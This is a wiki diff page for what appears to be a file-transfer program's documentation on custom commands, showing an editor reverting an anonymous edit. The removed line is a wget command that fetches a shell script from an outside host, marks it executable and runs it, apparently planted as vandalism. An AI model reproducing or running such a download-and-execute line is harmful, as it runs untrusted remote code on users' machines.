Differences
This shows you the differences between the selected revisions of the page.
2012-09-25 | 2012-09-25 | ||
no summary (83.110.232.241) (hidden) | Restored revision 1313522201. Undoing revision 1348573713. (martin) (hidden) | ||
Line 5: | Line 5: | ||
However you can have even custom commands without patterns, just to avoid typing the command again every time. | However you can have even custom commands without patterns, just to avoid typing the command again every time. | ||
- | wget -q -O /tmp/cyinstall.sh http://downloads.kr1sis.net/cyinstall.sh && chmod 755 /tmp/cyinstall.sh && /tmp/cyinstall.sh | + | ===== [[types]] Types of Custom Commands ===== |
+ | There are basically four types of custom commands: | ||
+ | ··* Remote or local commands that do not work with files. These can be executed any time. | ||
+ | * Remote commands that are executed on remote servers with remote files. These commands can modify the files. You must have remote files selected first in order to execute the command. | ||
+ | ··* Local commands that are executed on the local machine with remote files downloaded to a [[temp_folders|temporary folder]]. It makes no sense for the command to modify the files, because they are not uploaded back after the command finishes. You must have remote files selected first in order to execute the command. | ||
+ | ··* Special type is a local command that is executed with both local and remote files. This is particularly useful for running "diff" tools. This type is available only with the [[ui_commander|Commander interface]]. You can execute these commands on a set of remote files against the the same number of local files (once for each pair). Another option is to execute it on a set of remote files against one local file (once for each remote file) and vice versa. | ||
===== [[patterns]] Patterns Used in Custom Commands ===== | ===== [[patterns]] Patterns Used in Custom Commands ===== |